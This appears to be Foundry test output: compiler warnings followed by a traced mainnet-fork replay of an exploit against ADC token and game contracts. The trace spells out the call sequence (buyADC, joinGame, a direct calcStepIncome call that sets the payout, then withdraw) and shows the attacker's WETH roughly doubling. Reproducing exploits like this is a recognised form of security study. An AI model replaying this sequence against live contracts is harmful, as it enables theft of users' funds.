Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.33s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/ADC_exp.sol:56:5:
   |
56 |     IWETH private constant WETH = IWETH(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/ADC_exp.sol:58:5:
   |
58 |     IUSDC private constant USDC = IUSDC(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/ADC_exp.sol:89:5:
   |
89 |     IWETH WETH = IWETH(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-02/ADC_exp.sol:51:1:
   |
51 | contract Exploit is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-02/ADC_exp.sol:81:5:
   |
81 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-02/ADC_exp.sol:84:1:
   |
84 | contract Help is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-02/ADC_exp.sol:103:5:
    |
103 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (2462): Visibility for constructor is ignored. If you want the contract to be non-deployable, making it "abstract" is sufficient.
  --> src/test/2024-02/ADC_exp.sol:91:5:
   |
91 |     constructor() public payable {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 471.76ms (1.86ms CPU time)

Ran 1 test for src/test/2024-02/ADC_exp.sol:Exploit
[PASS] testexploit() (gas: 2053838)
Logs:
  Attacker WETH balance before exploit: 18.000000000000000000
  Attacker WETH balance after exploit: 36.099999999999999900

Traces:
  [5779] Exploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19138640 [1.913e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [2073738] Exploit::testexploit()
    ├─ [1829067] → new Help@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─ emit log_named_decimal_uint(key: "Attacker WETH balance before exploit", val: 18000000000000000000 [1.8e19], decimals: 18)
    │   ├─ [63413] 0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50::buyADC{value: 3000000000000000000}()
    │   │   ├─ [2519] 0xD357e4940b34Eb1406ef6A1Af53954e641273a3B::balanceOf(0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50) [staticcall]
    │   │   │   └─ ← [Return] 148551434380952380952375000 [1.485e26]
    │   │   ├─ [0] 0x1d13502CfB73FCa360d1af7703cD3F47abA809b5::fallback{value: 3000000000000000000}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ [28156] 0xD357e4940b34Eb1406ef6A1Af53954e641273a3B::transfer(Help: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 15000000000000000000000 [1.5e22])
    │   │   │   ├─ emit Transfer(from: 0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50, to: Help: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 15000000000000000000000 [1.5e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0 → 0x00000000000000000000000000000000000000000000032d26d12e980b600000
    │   │   │   │   @ 0x07a2006b5c5bbbd280e2b48d663adeeb9f2c801f5a1cfde921f5c00155fb73ba: 0x0000000000000000000000000000000000000000007ae0fd64e2a50114e96ed8 → 0x0000000000000000000000000000000000000000007addd03e11766909896ed8
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x2e174c10e159ea99b867ce3205125c24a42d128804e4070ed6fcc8cc98166aa0: 0x0000000000000000000000000000000000000000000148876d22f88da1e96ed8 → 0x00000000000000000000000000000000000000000001455a4651c9f596896ed8
    │   │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0 → 0x00000000000000000000000000000000000000000000032d26d12e980b600000
    │   │   │   @ 5: 0x00000000000000000000000000000000000000000003ae0539b5d50424169128 → 0x00000000000000000000000000000000000000000003b1326087039c2f769128
    │   │   └─ ← [Stop]
    │   ├─ [435697] 0xdE46fcF6aB7559E4355b8eE3D7fBa0f2730CDdd8::joinGame{value: 15000000000000000000}(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ [1322] 0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50::calDeductionADC(15000000000000000000 [1.5e19], true)
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000cb49b44ba602d80000
    │   │   ├─ [17244] 0xD357e4940b34Eb1406ef6A1Af53954e641273a3B::c3637897(0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f0000000000000000000000000000000000000000000000cb49b44ba602d80000)
    │   │   │   ├─ [5753] 0x49E298B95Bda30e6518509187Ff348e01117f404::getAddr("MAINPOOL") [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000de46fcf6ab7559e4355b8ee3d7fba0f2730cddd8
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2a313803c1ef3cf83aa42adaff4605cfd6b5d0f9ebdf4a3781ae61c0dfe06a26: 0x00000000000000000000000000000000000000000003437f142ec174e67b6590 → 0x00000000000000000000000000000000000000000003444a5de30d1ae9536590
    │   │   │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0x00000000000000000000000000000000000000000000032d26d12e980b600000 → 0x000000000000000000000000000000000000000000000261dd1ce2f208880000
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 10: 0x00000000000000000000000000000000000000000003437f142ec174e67b6590 → 0x00000000000000000000000000000000000000000003444a5de30d1ae9536590
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb135: 0 → 1
    │   │   │   @ 0x0f36ad39aee03e7108cc48f54934702a5f0d4066f10344cebf8198978d869771: 0 → 1
    │   │   │   @ 0xcde0d3820f7163ac8d72ee2dcc256badab10d60b899a92449f5764b31838e3f1: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   @ 0x9a6d7a09702d26709483127216ea63b7c57805befc2fa8d9af25162caae84ab9: 0 → 1
    │   │   │   @ 0x2e174c10e159ea99b867ce3205125c24a42d128804e4070ed6fcc8cc98166aa0: 0 → 0x000000000000000000000000000000000000000000000000c5c22b8011510000
    │   │   │   @ 0x625b35f5e76f098dd7c3a05b10e2e5e78a4a01228d60c3b143426cdf36d26455: 0 → 0x0000000000000000000000000000000000000000000000000a688906bd8b0000
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb12d: 0 → 0x000000000000000000000000000000000000000000000000d02ab486cedc0000
    │   │   │   @ 0x18abd7ec20a8bb1480b7ba84db3adad48d64c0eb74ce7a6f8ea7746e1a2fc222: 0 → 529
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb12f: 0 → 0x0000000000000000000000000000000000000000000000000000000065bc7d83
    │   │   │   @ 0x75f96ab15d697e93042dc45b5c896c4b27e89bb6eaf39475c5c371cb2513f7d2: 0x0000000000000000000000000000000000000000000000012f3acb3bd6490000 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe79a0000
    │   │   │   @ 0xa9bc9a3a348c357ba16b37005d7e6b3236198c0e939f4af8c5f19b8deeb8ebc0: 0x0000000000000000000000000000000000000000000000012f3acb3bd6490000 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe79a0000
    │   │   │   @ 20: 528 → 529
    │   │   │   @ 0xcbc4e5fb02c3d1de23a9f1e014b4d2ee5aeaea9505df5e855c9210bf472495af: 0 → 0x000000000000000000000000000000000000000000000000d02ab486cedc0000
    │   │   │   @ 0x0f36ad39aee03e7108cc48f54934702a5f0d4066f10344cebf8198978d86976d: 0 → 529
    │   │   │   @ 0x4132ba5fcd01ffc8c39fc16e07a48a65a68e6b724c0a233f4fffd48389f43600: 0 → 529
    │   │   │   @ 0x34ae0ffa2d4ef0b9bec8695c9af32173ce8c4d3e0b08946e21aacff605f4ea13: 0 → 0x000000000000000000000000000000000000000000000002086ac35105260000
    │   │   │   @ 0xba571cc4dae133e2030be5a327e222512c7b4680c7ee7e29ce278de2acacc1d9: 0 → 0x0000000000000000000000000000000000000000000000cb49b44ba602d80000
    │   │   │   @ 0x0f36ad39aee03e7108cc48f54934702a5f0d4066f10344cebf8198978d86976c: 0 → 1
    │   │   │   @ 0x027bf131eb0106c142da829df3eeb5725111f5484f1763f5d9e1502a1e264088: 0 → 529
    │   │   └─ ← [Stop]
    │   ├─ [47148] 0xdE46fcF6aB7559E4355b8eE3D7fBa0f2730CDdd8::calcStepIncome(529, 36099999999999999900 [3.609e19], 100)
    │   │   ├─  storage changes:
    │   │   │   @ 0xa9bc9a3a348c357ba16b37005d7e6b3236198c0e939f4af8c5f19b8deeb8ebc0: 0x000000000000000000000000000000000000000000000001f4fcf6bbe79a0000 → 100
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb134: 0 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe799ff9c
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb130: 0 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe799ff9c
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 0x18abd7ec20a8bb1480b7ba84db3adad48d64c0eb74ce7a6f8ea7746e1a2fc222: 0 → 529
    │   │   @ 34: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   @ 33: 0 → 0x0000000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d
    │   │   @ 32: 0 → 0x000000000000000000000000de46fcf6ab7559e4355b8ee3d7fba0f2730cddd8
    │   │   @ 12: 0 → 1
    │   │   @ 31: 0 → 0x0000000000000000000000ae2c7af5fc2ddf45e6250a4c5495e61afc7acf5001
    │   │   @ 5: 0x00000000000000000000000000000000000000000003ae0539b5d50424169128 → 0x00000000000000000000000000000000000000000003b1326087039c2f769128
    │   └─ ← [Return] 5734 bytes of code
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0xdE46fcF6aB7559E4355b8eE3D7fBa0f2730CDdd8, 18000000000000000000 [1.8e19])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xdE46fcF6aB7559E4355b8eE3D7fBa0f2730CDdd8, value: 18000000000000000000 [1.8e19])
    │   ├─  storage changes:
    │   │   @ 0x301a6605a89be7a387435656b6320a6ced740b2283a42cb53f899dd23d172a5b: 0 → 0x000000000000000000000000000000000000000000000000f9ccd8a1c5080000
    │   └─ ← [Return] true
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50, 18000000000000000000 [1.8e19])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50, value: 18000000000000000000 [1.8e19])
    │   ├─  storage changes:
    │   │   @ 0x04b3fc2007b661c31d4a8a2cb8524ad8186c5a5d3c456da4bf710f366f43614c: 0 → 0x000000000000000000000000000000000000000000000000f9ccd8a1c5080000
    │   └─ ← [Return] true
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(Help: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 18000000000000000000 [1.8e19])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Help: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 18000000000000000000 [1.8e19])
    │   ├─  storage changes:
    │   │   @ 0xfe7049f8d941671fef47343267d5e7eb629c9c0fe15c8bac114220d26f9d5068: 0 → 0x000000000000000000000000000000000000000000000000f9ccd8a1c5080000
    │   └─ ← [Return] true
    ├─ [101781] Help::startwith()
    │   ├─ [101143] 0xdE46fcF6aB7559E4355b8eE3D7fBa0f2730CDdd8::withdraw()
    │   │   ├─ [1312] 0xaE2C7af5fc2dDF45e6250a4C5495e61afC7AcF50::calDeductionADC(36099999999999999900 [3.609e19], false)
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000001e93f08f3802c639e58
    │   │   ├─ [519] 0xD357e4940b34Eb1406ef6A1Af53954e641273a3B::balanceOf(Help: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 11250000000000000000000 [1.125e22]
    │   │   ├─ [3944] 0xD357e4940b34Eb1406ef6A1Af53954e641273a3B::c3637897(0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f0000000000000000000000000000000000000000000001e93f08f3802c639e58)
    │   │   │   ├─ [1753] 0x49E298B95Bda30e6518509187Ff348e01117f404::getAddr("MAINPOOL") [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000de46fcf6ab7559e4355b8ee3d7fba0f2730cddd8
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0x000000000000000000000000000000000000000000000261dd1ce2f208880000 → 0x0000000000000000000000000000000000000000000000789e13ef71dc2461a8
    │   │   │   │   @ 0x2a313803c1ef3cf83aa42adaff4605cfd6b5d0f9ebdf4a3781ae61c0dfe06a26: 0x00000000000000000000000000000000000000000003444a5de30d1ae9536590 → 0x0000000000000000000000000000000000000000000346339cec009b15b703e8
    │   │   │   └─ ← [Stop]
    │   │   ├─ [41] Help::fallback{value: 36099999999999999900}()
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0x3be6fd20d5acfde5b873b48692cd31f4d3c7e8ee8a813af4696af8859e5ca6c6: 0 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe799ff9c
    │   │   │   @ 0xba571cc4dae133e2030be5a327e222512c7b4680c7ee7e29ce278de2acacc1d9: 0x0000000000000000000000000000000000000000000000cb49b44ba602d80000 → 0x0000000000000000000000000000000000000000000002b488bd3f262f3b9e58
    │   │   │   @ 0x2a313803c1ef3cf83aa42adaff4605cfd6b5d0f9ebdf4a3781ae61c0dfe06a26: 0x00000000000000000000000000000000000000000003444a5de30d1ae9536590 → 0x0000000000000000000000000000000000000000000346339cec009b15b703e8
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb12e: 0 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe799ff9c
    │   │   │   @ 0x75f96ab15d697e93042dc45b5c896c4b27e89bb6eaf39475c5c371cb2513f7d2: 0x000000000000000000000000000000000000000000000001f4fcf6bbe79a0000 → 100
    │   │   │   @ 0x6034e6907789241a6485039419c5bff056506cb171b039005f0c7fdcba6eb134: 0x000000000000000000000000000000000000000000000001f4fcf6bbe799ff9c → 0
    │   │   │   @ 0x12124c0312d17f0c8052ea5527604a4d97d90236ebeb4e3533d3d0b6ba8f59b8: 0 → 0x000000000000000000000000000000000000000000000001f4fcf6bbe799ff9c
    │   │   │   @ 10: 0x00000000000000000000000000000000000000000003444a5de30d1ae9536590 → 0x0000000000000000000000000000000000000000000346339cec009b15b703e8
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "Attacker WETH balance after exploit", val: 36099999999999999900 [3.609e19], decimals: 18)
    ├─  storage changes:
    │   @ 0x04b3fc2007b661c31d4a8a2cb8524ad8186c5a5d3c456da4bf710f366f43614c: 0 → 0x000000000000000000000000000000000000000000000000f9ccd8a1c5080000
    │   @ 0xfe7049f8d941671fef47343267d5e7eb629c9c0fe15c8bac114220d26f9d5068: 0 → 0x000000000000000000000000000000000000000000000000f9ccd8a1c5080000
    │   @ 38: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 15.87s (14.62s CPU time)

Ran 2 test suites in 16.69s (16.34s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
